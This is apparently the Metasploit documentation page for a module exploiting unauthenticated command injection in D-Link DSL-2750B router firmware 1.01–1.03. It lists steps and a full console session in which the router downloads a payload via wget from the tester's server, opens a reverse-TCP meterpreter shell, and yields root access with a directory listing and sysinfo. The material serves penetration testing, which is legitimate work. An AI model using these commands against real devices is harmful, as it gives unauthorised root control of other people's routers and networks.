2.9 KiB
2.9 KiB
Description
This module dlink_dsl2750b_exec_noauth exploits unauthenticated command injection vulnerability through "cli" parameter. Vulnerable firmwares are 1.01 up to 1.03.
Verification Steps
- Start msfconsole
- Do :
use exploit/linux/http/dlink_dsl2750b_exec_noauth - Do :
set RHOST [RouterIP] - Do :
set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp - Do :
run - If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session
Scenarios
msf > use exploit/linux/http/dlink_dsl2750b_exec_noauth
msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0
LHOST => eth0
msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555
LPORT => 5555
msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > run
msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > run
[*] Started reverse TCP handler on 192.168.1.6:5555
[*] 192.168.1.1:80 Checking target version...
[*] Using URL: http://0.0.0.0:8080/1M6nI0Or6FUiW
[*] Local IP: http://192.168.1.6:8080/1M6nI0Or6FUiW
[*] Client 192.168.1.1 (Wget) requested /1M6nI0Or6FUiW
[*] Sending payload to 192.168.1.1 (Wget)
[*] Sending stage (1104216 bytes) to 192.168.1.1
[*] Meterpreter session 25 opened (192.168.1.6:5555 -> 192.168.1.1:48989) at 2018-05-14 05:30:49 -0400
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > ls -la
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 2554 dir 2013-03-11 07:27:09 -0400 bin
40755/rwxr-xr-x 3 dir 2013-03-11 07:27:54 -0400 data
40755/rwxr-xr-x 2482 dir 2013-03-11 07:27:56 -0400 dev
40755/rwxr-xr-x 779 dir 2013-03-11 07:27:55 -0400 etc
40755/rwxr-xr-x 690 dir 2013-03-11 07:27:55 -0400 lib
100755/rwxr-xr-x 287124 fil 2013-03-11 07:27:55 -0400 linuxrc
40755/rwxr-xr-x 0 dir 1969-12-31 19:00:01 -0500 mnt
40755/rwxr-xr-x 56 dir 2013-03-11 07:13:15 -0400 opt
40555/r-xr-xr-x 0 dir 1969-12-31 19:00:00 -0500 proc
40755/rwxr-xr-x 270 dir 2013-03-11 07:25:43 -0400 sbin
40755/rwxr-xr-x 0 dir 1969-12-31 19:00:00 -0500 sys
40755/rwxr-xr-x 0 dir 2016-10-08 07:54:13 -0400 tmp
40755/rwxr-xr-x 38 dir 2013-03-11 07:23:32 -0400 usr
40755/rwxr-xr-x 0 dir 2016-10-08 07:46:13 -0400 var
40755/rwxr-xr-x 2801 dir 2013-03-11 07:26:34 -0400 webs
meterpreter > sysinfo
Computer : 192.168.1.1
OS : (Linux 2.6.30)
Architecture : mips
BuildTuple : mips-linux-muslsf
Meterpreter : mipsbe/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >